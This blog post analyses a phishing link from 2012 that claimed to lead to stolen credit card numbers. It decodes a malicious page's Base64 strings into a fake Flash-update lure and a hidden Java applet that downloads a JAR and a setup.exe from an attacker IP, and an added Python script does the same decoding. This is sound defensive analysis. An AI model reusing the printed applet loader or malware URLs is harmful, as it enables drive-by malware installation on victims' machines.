I got a phishing mail, and I followed it

Rishi Narang

We come across so many links via social networking websites, and we unknowingly click many of them. Malicious links can have catastrophic results: the system and your privacy are compromised, or your data takes the hit. Here is one such analysis of a link dated 17.April.2012 that I came across via Twitter and LinkedIn.

NOTE: All links have been written with the 'non-clickable' hxxp:// prefix to prevent mistaken clicks.

Someone posted this link (hxxp://pastebin.com/dRGHt7hy) in a tweet. On checking, it was a list of URLs (actually a single URL pasted multiple times – a sign of desperation),

  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg

9954 credit card numbers

The paste claims this link leads to 9954 credit card numbers. The first hint that something is off: why not post the numbers directly rather than paste the same link 4 times in one entry?

Next, this is far too tempting a target, so tread carefully. I opened the link in Malzilla (http://malzilla.sourceforge.net/), a malware hunting tool, with auto-redirect disabled. The link hxxp://tinyurl.com/saw87hujnworeg redirected to hxxp://212.95.43.243/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b, which opened as text fields with scripts. The page contained only a 'doubtful' script along with some headings and titles.

Here is the only important script contained in the page. Let's do the analysis.

This script is hard to follow because of its long variable names, so let's first change the variable names to shorter versions for better understanding. Here is the modified script with short variable names, without changing its logic or behaviour.

Now it is easy to understand the logic and behaviour of the script. First, let us decode the setTimeout and document.write arguments. They look Base64-encoded, so let's try to decode them. The encoded strings are,

1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==
2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=
3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yMTIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY1Yi5qYXIiPg0KCQk8cGFyYW0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTBiNzQwZWJjYzJhYmJjNTUxMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NCgkJPHBhcmFtIG5hbWU9IkxlZ3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2FwcGxldD4=

Decoded strings are,

1. Adobe Flash must be updated to view this, please install the latest version!
2. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
3. <applet width="0px" height="0px" code="SiteLoader.class" archive="hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar">
   <param name="wcZPN" value="hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b">
   <param name="v8TOX" value="setup.exe">
   <param name="Legym" value="www.dogscast.com">
   <param name="MpBDG" value="APPDATA">
   </applet>

The first decoded string is the lure: it tells the victim to install the 'latest version' of Flash from the malicious link. The script will then issue GET requests to the following links,

  1. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
  2. hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar
  3. hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b

And the applet parameters are,

  1. name="wcZPN" value="hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b"
  2. name="v8TOX" value="setup.exe"
  3. name="Legym" value="www.dogscast.com"
  4. name="MpBDG" value="APPDATA"
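As an added example (not part of the original post), here is a small Python helper that reproduces the decoding step above: it takes the three Base64 strings recovered from the page, decodes them, pulls out the applet's attributes and <param> values, and defangs every URL into the same hxxp:// form used in this post. The function and variable names are my own.

```python
import base64
import re

# The three Base64 strings from the setTimeout / document.write calls above.
# The third is kept in its original line-wrapped form via implicit concatenation.
ENCODED = [
    "QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==",
    "aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=",
    "DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yM"
    "TIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY1Yi5qYXIiPg0KCQk8cGFyYW"
    "0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTBiNzQwZWJjYzJhYmJjNTU"
    "xMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NCgkJPHBhcmFtIG5hbWU9Ikxl"
    "Z3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2Fwc"
    "GxldD4=",
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
PARAM_RE = re.compile(r'<param\s+name="([^"]+)"\s+value="([^"]*)"', re.I)
APPLET_RE = re.compile(r"<applet\b([^>]*)>", re.I)

def decode_b64(blob: str) -> str:
    """Decode one Base64 blob; tolerate line wrapping and stripped '=' padding."""
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")

def defang(url: str) -> str:
    """Write a URL in the non-clickable hxxp:// form used in this post."""
    return re.sub(r"^http(s?)://", r"hxxp\1://", url, flags=re.I)

def applet_info(html: str) -> dict:
    """Return the <applet> tag's attributes plus its <param> name/value pairs."""
    m = APPLET_RE.search(html)
    attrs = dict(re.findall(r'(\w+)="([^"]*)"', m.group(1))) if m else {}
    return {"attrs": attrs, "params": dict(PARAM_RE.findall(html))}

def triage(blobs):
    """Decode every blob, collect defanged URLs in first-seen order, parse any applet."""
    decoded = [decode_b64(b) for b in blobs]
    urls = []
    for text in decoded:
        for u in URL_RE.findall(text):
            if u not in urls:
                urls.append(u)
    applet = next((applet_info(t) for t in decoded if "<applet" in t.lower()), None)
    return {"decoded": decoded, "urls": [defang(u) for u in urls], "applet": applet}

if __name__ == "__main__":
    result = triage(ENCODED)
    print("Lure text:", result["decoded"][0])
    for u in result["urls"]:
        print("URL      :", u)
    if result["applet"]:
        print("Applet   :", result["applet"]["attrs"].get("code"))
        for k, v in result["applet"]["params"].items():
            print("  param  :", k, "=", defang(v))
```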

Let us now access these URLs.

  1. First I accessed the adobe.php URL (hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla, and it downloaded a file "Adobe-Flash_WIN.exe" to my system. The size of this file is approx. 1.16 Mb. When scanned via VirusTotal, this file had a detection rate of 2/42 anti-malware products. Now, this is scary. I didn't get a chance to do the run-time analysis of this file, but I will post it in the next blog.

  2. Accessing the second URL (hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar) downloads a JAR file "0b740ebcc2abbc5512c4875a0f74965b.jar". When extracted, it contains a "META-INF" directory and the "SiteLoader.class" file. The contents of META-INF include,

    • JUBUHUSE.DSA
    • JUBUHUSE.SF
    • MANIFEST.MF

Now let's analyze the third URL, load.php (hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b), via Malzilla. When accessed, this link downloads a "setup.exe" file to the host. This file is the same as the previous file, as confirmed by the SHA256 hash cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5.

This is a brief analysis of a phishing link that started on Twitter as a Pastebin link and made its way onto your system through several files.

Cover Image: Photo by Wynand van Poortvliet on Unsplash